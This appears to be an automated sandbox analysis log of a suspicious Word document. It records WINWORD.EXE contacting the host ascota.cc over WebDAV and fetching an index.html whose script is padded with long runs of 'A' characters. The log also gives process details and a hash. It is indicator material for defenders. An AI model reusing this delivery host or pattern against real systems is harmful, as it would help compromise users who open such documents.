        2022-08-18 08:45:09 UTC2INHTTP/1.1 400 Bad Request
        server: Fly/73887856 (2022-08-12)
        fly-request-id: 01GAR21CHFQ62V70GTWY0546GR-ams
        date: Thu, 18 Aug 2022 08:45:09 GMT
        content-type: application/xml
        x-amz-request-id: YNG5XBXWTCRVTJW9
        x-amz-id-2: joJD9vCOXZWuY5cnxPLgORWIlQkMw1ZjcknPVN1GC/nbGGsl2W7dL/WA7w9XvJx+qayLCvE48hU=
        transfer-encoding: chunked
        via: 1.1 fly.io
        2022-08-18 08:45:09 UTC2INData Raw: 31 31 42 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 42 61 64 52 65 71 75 65 73 74 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 49 6e 73 75 66 66 69 63 69 65 6e 74 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 20 4f 72 69 67 69 6e 20 72 65 71 75 65 73 74 20 68 65 61 64 65 72 20 6e 65 65 64 65 64 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 52 65 71 75 65 73 74 49 64 3e 59 4e 47 35 58 42 58 57 54 43 52 56 54 4a 57 39 3c 2f 52 65 71 75 65 73 74 49 64 3e 3c 48 6f 73 74 49 64 3e 6a 6f 4a 44 39 76 43 4f 58 5a 57 75 59 35 63 6e 78 50 4c 67 4f 52 57 49 6c 51 6b 4d 77 31 5a 6a 63 6b 6e 50 56 4e 31 47 43 2f 6e 62 47 47 73 6c 32 57 37 64 4c 2f 57 41 37 77 39 58
        Data Ascii: 11B<?xml version="1.0" encoding="UTF-8"?><Error><Code>BadRequest</Code><Message>Insufficient information. Origin request header needed.</Message><RequestId>YNG5XBXWTCRVTJW9</RequestId><HostId>joJD9vCOXZWuY5cnxPLgORWIlQkMw1ZjcknPVN1GC/nbGGsl2W7dL/WA7w9X
        2022-08-18 08:45:09 UTC2INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortProcess
        4192.168.2.224917550.31.246.2443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        TimestampkBytes transferredDirectionData
        2022-08-18 08:45:09 UTC2OUTOPTIONS / HTTP/1.1
        Connection: Keep-Alive
        User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
        translate: f
        Host: ascota.cc
        2022-08-18 08:45:09 UTC3INHTTP/1.1 400 Bad Request
        server: Fly/73887856 (2022-08-12)
        fly-request-id: 01GAR21CT53GWGJWQP08YN975E-ams
        date: Thu, 18 Aug 2022 08:45:09 GMT
        content-type: application/xml
        x-amz-request-id: YNG0WC4RDWRQKZ8M
        x-amz-id-2: 1wSvxDCH+FpZcpiChvHVSeCnFKFVwIWhVeLGKpr+ZbZrJNUT884hbMl4hdBZ2GUf94wlwJ5DU3Y=
        transfer-encoding: chunked
        via: 1.1 fly.io
        2022-08-18 08:45:09 UTC3INData Raw: 31 31 42 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 42 61 64 52 65 71 75 65 73 74 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 49 6e 73 75 66 66 69 63 69 65 6e 74 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 20 4f 72 69 67 69 6e 20 72 65 71 75 65 73 74 20 68 65 61 64 65 72 20 6e 65 65 64 65 64 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 52 65 71 75 65 73 74 49 64 3e 59 4e 47 30 57 43 34 52 44 57 52 51 4b 5a 38 4d 3c 2f 52 65 71 75 65 73 74 49 64 3e 3c 48 6f 73 74 49 64 3e 31 77 53 76 78 44 43 48 2b 46 70 5a 63 70 69 43 68 76 48 56 53 65 43 6e 46 4b 46 56 77 49 57 68 56 65 4c 47 4b 70 72 2b 5a 62 5a 72 4a 4e 55 54 38 38 34 68 62 4d 6c 34 68 64 42 5a
        Data Ascii: 11B<?xml version="1.0" encoding="UTF-8"?><Error><Code>BadRequest</Code><Message>Insufficient information. Origin request header needed.</Message><RequestId>YNG0WC4RDWRQKZ8M</RequestId><HostId>1wSvxDCH+FpZcpiChvHVSeCnFKFVwIWhVeLGKpr+ZbZrJNUT884hbMl4hdBZ
        2022-08-18 08:45:09 UTC3INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortProcess
        5192.168.2.224917650.31.246.2443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        TimestampkBytes transferredDirectionData
        2022-08-18 08:45:09 UTC3OUTOPTIONS / HTTP/1.1
        Connection: Keep-Alive
        User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
        translate: f
        Host: ascota.cc
        2022-08-18 08:45:09 UTC3INHTTP/1.1 400 Bad Request
        server: Fly/73887856 (2022-08-12)
        fly-request-id: 01GAR21D2DWR96GM644V4CS0C7-ams
        date: Thu, 18 Aug 2022 08:45:09 GMT
        content-type: application/xml
        x-amz-request-id: YNGAJTFAEDQRFK89
        x-amz-id-2: 2S20O3UKJkTANDci9RbTNIxMTHStwbp6gYGfPmiAIxlPQCG1JwxNsj4X448U3KEouJUxK44psr8=
        transfer-encoding: chunked
        via: 1.1 fly.io
        2022-08-18 08:45:09 UTC4INData Raw: 31 31 42 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 42 61 64 52 65 71 75 65 73 74 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 49 6e 73 75 66 66 69 63 69 65 6e 74 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 20 4f 72 69 67 69 6e 20 72 65 71 75 65 73 74 20 68 65 61 64 65 72 20 6e 65 65 64 65 64 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 52 65 71 75 65 73 74 49 64 3e 59 4e 47 41 4a 54 46 41 45 44 51 52 46 4b 38 39 3c 2f 52 65 71 75 65 73 74 49 64 3e 3c 48 6f 73 74 49 64 3e 32 53 32 30 4f 33 55 4b 4a 6b 54 41 4e 44 63 69 39 52 62 54 4e 49 78 4d 54 48 53 74 77 62 70 36 67 59 47 66 50 6d 69 41 49 78 6c 50 51 43 47 31 4a 77 78 4e 73 6a 34 58 34 34 38 55
        Data Ascii: 11B<?xml version="1.0" encoding="UTF-8"?><Error><Code>BadRequest</Code><Message>Insufficient information. Origin request header needed.</Message><RequestId>YNGAJTFAEDQRFK89</RequestId><HostId>2S20O3UKJkTANDci9RbTNIxMTHStwbp6gYGfPmiAIxlPQCG1JwxNsj4X448U
        2022-08-18 08:45:09 UTC4INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortProcess
        6192.168.2.224917750.31.246.2443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        TimestampkBytes transferredDirectionData
        2022-08-18 08:45:09 UTC4OUTGET /index.html HTTP/1.1
        Accept: */*
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
        UA-CPU: AMD64
        Accept-Encoding: gzip, deflate
        Host: ascota.cc
        Connection: Keep-Alive
        2022-08-18 08:45:10 UTC4INHTTP/1.1 200 OK
        server: Fly/73887856 (2022-08-12)
        fly-request-id: 01GAR21DBDTEDA54EJ48R2VCYW-ams
        date: Thu, 18 Aug 2022 08:45:09 GMT
        content-type: text/html; charset=utf-8
        content-length: 9436
        x-amz-id-2: AhxK5aLQZ1PjKJoj0ibw5Xtl2lf0z/QP7EC/OySp7DCwGP9zWrvKgojPTiA0MsKZcB7AOdkKzvo=
        x-amz-request-id: YNG9STNWQ7HFF8XV
        last-modified: Thu, 02 Jun 2022 20:21:18 GMT
        etag: "fbdacf8fb5cca0abfed43223d32f89dd"
        cache-control: no-cache
        x-amz-version-id: _B5BvVk8YuP8u1cg.NIoue0nA32fvfEh
        accept-ranges: bytes
        via: 1.1 fly.io
        2022-08-18 08:45:10 UTC5INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 62 6f 64 79 3e 0a 3c 73 63 72 69 70 74 3e 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
        Data Ascii: <!doctype html><html lang="en"><body><script>//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        2022-08-18 08:45:10 UTC12INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAA//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//AAAAAAAAAAAAAAAAAAAAAAA


        Session IDSource IPSource PortDestination IPDestination PortProcess
        7192.168.2.224917850.31.246.2443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        TimestampkBytes transferredDirectionData
        2022-08-18 08:45:10 UTC14OUTHEAD /index.html HTTP/1.1
        User-Agent: Microsoft Office Existence Discovery
        Host: ascota.cc
        Content-Length: 0
        Connection: Keep-Alive
        2022-08-18 08:45:10 UTC14INHTTP/1.1 200 OK
        server: Fly/73887856 (2022-08-12)
        fly-request-id: 01GAR21DVF39Z3A7ZKSQECSWH2-ams
        date: Thu, 18 Aug 2022 08:45:10 GMT
        content-type: text/html; charset=utf-8
        content-length: 9436
        x-amz-id-2: HR7igUOesPfCastI3h2FQOhhWsp2k3NgZZQd+iLy3m0d92PxPtHZULvIM12hiUzbZGcJPw2qxU0=
        x-amz-request-id: B35HXHYTB0YQGGDQ
        last-modified: Thu, 02 Jun 2022 20:21:18 GMT
        etag: "fbdacf8fb5cca0abfed43223d32f89dd"
        cache-control: no-cache
        x-amz-version-id: _B5BvVk8YuP8u1cg.NIoue0nA32fvfEh
        accept-ranges: bytes
        via: 1.1 fly.io


        Session IDSource IPSource PortDestination IPDestination PortProcess
        8192.168.2.224917950.31.246.2443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        TimestampkBytes transferredDirectionData
        2022-08-18 08:45:10 UTC15OUTHEAD /index.html HTTP/1.1
        User-Agent: Microsoft Office Existence Discovery
        Host: ascota.cc
        Content-Length: 0
        Connection: Keep-Alive
        2022-08-18 08:45:11 UTC15INHTTP/1.1 200 OK
        server: Fly/73887856 (2022-08-12)
        fly-request-id: 01GAR21EAS9MDEN75X427YDYCC-ams
        date: Thu, 18 Aug 2022 08:45:11 GMT
        content-type: text/html; charset=utf-8
        content-length: 9436
        x-amz-id-2: OsOiTPD8bnidS4SpG3HCJNAX5QYh7sTMji4DqVSeZiCSCYehuCsaGLhpnPZoR8INBEgcL3evKvA=
        x-amz-request-id: PBB0ZH5B75VYEHGV
        last-modified: Thu, 02 Jun 2022 20:21:18 GMT
        etag: "fbdacf8fb5cca0abfed43223d32f89dd"
        cache-control: no-cache
        x-amz-version-id: _B5BvVk8YuP8u1cg.NIoue0nA32fvfEh
        accept-ranges: bytes
        via: 1.1 fly.io


        Session IDSource IPSource PortDestination IPDestination PortProcess
        9192.168.2.224918050.31.246.2443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        TimestampkBytes transferredDirectionData
        2022-08-18 08:45:11 UTC15OUTOPTIONS / HTTP/1.1
        User-Agent: Microsoft Office Protocol Discovery
        Host: ascota.cc
        Content-Length: 0
        Connection: Keep-Alive
        2022-08-18 08:45:11 UTC15INHTTP/1.1 400 Bad Request
        server: Fly/73887856 (2022-08-12)
        fly-request-id: 01GAR21EP5AT8FVJBEERW6SPTK-ams
        date: Thu, 18 Aug 2022 08:45:11 GMT
        content-type: application/xml
        x-amz-request-id: PBB8W4QV1K6X9AYW
        x-amz-id-2: IzrvgZhCdOn/chNbzt9CdOfKEhC8Q/SwBU3e2VAiysopEQ8saCB7IzfwjIF7Y6PLOERKLew0Cq0KsrBvYZUD+A==
        transfer-encoding: chunked
        via: 1.1 fly.io
        2022-08-18 08:45:11 UTC16INData Raw: 31 32 37 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 42 61 64 52 65 71 75 65 73 74 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 49 6e 73 75 66 66 69 63 69 65 6e 74 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 20 4f 72 69 67 69 6e 20 72 65 71 75 65 73 74 20 68 65 61 64 65 72 20 6e 65 65 64 65 64 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 52 65 71 75 65 73 74 49 64 3e 50 42 42 38 57 34 51 56 31 4b 36 58 39 41 59 57 3c 2f 52 65 71 75 65 73 74 49 64 3e 3c 48 6f 73 74 49 64 3e 49 7a 72 76 67 5a 68 43 64 4f 6e 2f 63 68 4e 62 7a 74 39 43 64 4f 66 4b 45 68 43 38 51 2f 53 77 42 55 33 65 32 56 41 69 79 73 6f 70 45 51 38 73 61 43 42 37 49 7a 66 77 6a 49 46 37
        Data Ascii: 127<?xml version="1.0" encoding="UTF-8"?><Error><Code>BadRequest</Code><Message>Insufficient information. Origin request header needed.</Message><RequestId>PBB8W4QV1K6X9AYW</RequestId><HostId>IzrvgZhCdOn/chNbzt9CdOfKEhC8Q/SwBU3e2VAiysopEQ8saCB7IzfwjIF7


        Statistics

        CPU Usage

        Click to jump to process

        Memory Usage

        Click to jump to process

        High Level Behavior Distribution

        Click to dive into process behavior distribution

        System Behavior

        General

        Target ID:0
        Start time:10:44:15
        Start date:18/08/2022
        Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        Wow64 process (32bit):false
        Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
        Imagebase:0x13f8e0000
        File size:1423704 bytes
        MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high

        Disassembly

        No disassembly